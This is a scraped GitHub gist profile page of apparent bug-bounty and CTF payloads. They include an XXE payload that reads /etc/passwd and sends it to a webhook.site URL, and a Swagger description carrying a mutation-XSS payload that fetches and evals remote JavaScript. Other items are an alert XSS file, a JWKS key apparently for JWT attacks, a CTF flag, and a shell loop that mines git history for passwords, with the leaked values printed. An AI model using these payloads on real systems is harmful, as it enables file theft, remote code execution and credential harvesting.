Skip to content

Instantly share code, notes, and snippets.

View ajdumanhug's full-sized avatar
🏠
Working from home

Aj Dumanhug ajdumanhug

🏠
Working from home
View GitHub Profile
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Vulnerable JavaScript Example</title>
<script>
const secret = "SuperSecret123";
function login() {
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
@ajdumanhug
ajdumanhug / index.html
Created September 20, 2023 18:45
Simple Login Form Animated
<div class="login">
<div class="form">
<h2>NOT WORKING YET!</h2>
<h3>Login</h3>
<input type="text" placeholder="Username">
<input type="password" placeholder="Password">
<input type="submit" value="Sign In" class="submit">
</div>
</div>
@ajdumanhug
ajdumanhug / jwks.json
Last active September 20, 2023 18:00
{
"keys": [
{
"alg": "RS256",
"x5c": [
"MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAqrgOv9Czows21TmZA8UJ+B2VG4oDtCYBQ3s1y6V6v4gCAA4tnLtrQc4sUqsiJ4X78UBEV7eVnOYXgb4kuzVhuurzifI/ky6A0TekoaANxTyNLx0RucpzT23iyyix6NKCUD9o5jg7K0Lt8tBi8hOl7VomFpBcxPPI7S5BzewJS+QCJj3QQB8cgC047HRUEaJKRcPb5VPcNleGjc7caZUqtbVZETfp0OsIdPuUa0s6c8ZIrTfDrdG74HYlX8BY5rsJT39nSpFO/cDjHm2jgXbVbvmRzZ/hkasxO0q+uTKqPZVfa30leHzvCn1heuVgut9WlCxNrtjR3lmr8HKis3b5tvdUZNCyBv4OgJ0dxrBpa4SVDjnfjzCTx6krqkyRs5meOOZ5FntKT7Q700q49U/04mskamce244TbN2sP4ino26Mjfn175pq1VDU5gh+4yelfYzCUFiz+5xOqpmoAZn3xI4WzvrWwZCiLXQGTgKhwpskfKTMQ5k8ytWCR80wU1epDIYMbFGTauIVLouiQPC1xDTJA7sq/sC2Zf44+qCctO0Kc2gh77em5QmT/a7cG7D4Ct76dzTmy+04mKEMM+K1AFZGzt4GlvaRlGZ5zWsWzHw8oIimQP1Ua90aHU/uotbKLcxTzQZQ/WqXnUWgmi6LtxcCq2B+kDB380liDMt2nFkCAwEAAQ=="
]
}
]
}
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % xxe "<!ENTITY exfil SYSTEM 'https://webhook.site/1b43cfb3-3c7c-490e-b77c-37aa66ef9e3b/?data=%file;'>">
%xxe;
{
"url": "https://gist.githubusercontent.com/ajdumanhug/596672ed001e78288c8516c28aa6575f/raw/50e54cec13ea40f3115dcf45e60fbca531b1eb90/test.yaml",
"urls": [
{
"url": "https://gist.githubusercontent.com/ajdumanhug/596672ed001e78288c8516c28aa6575f/raw/50e54cec13ea40f3115dcf45e60fbca531b1eb90/test.yaml",
"name": "Foo"
}
]
}
alert(/XSS by AJ/);
swagger: '2.0'
info:
title: Classic API Resource Documentation
description: |
<form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=fetch('https://gist.githubusercontent.com/ajdumanhug/5026beb333226700c029b46324234e17/raw/357a217fb6499a2bce747e7d545fc84f3f77b921/xss.js').then(function(res){res.text().then(function(data){eval(data)})}) src=1>"></form>
version: production
basePath: /JSSResource/
produces:
- application/xml
[
{
"text": "RC15{34zy_cLi3n7_s1d3_ch4ll3n63}",
"author": "AJ Dumanhug"
}
]

Finding creds in git repos is awesome.

$ for commit in $(seq 1 $(git reflog | wc -l)); do git diff HEAD@{$commit} 2>/dev/null | grep password; done
-spring.datasource.password=g!'301T%y%xT@uL`
+spring.datasource.password=4AT&G;[H@&'\^uDK
-spring.datasource.password=UmAnR=-v|{2=gyx?
+spring.datasource.password=4AT&G;[H@&'\^uDK
...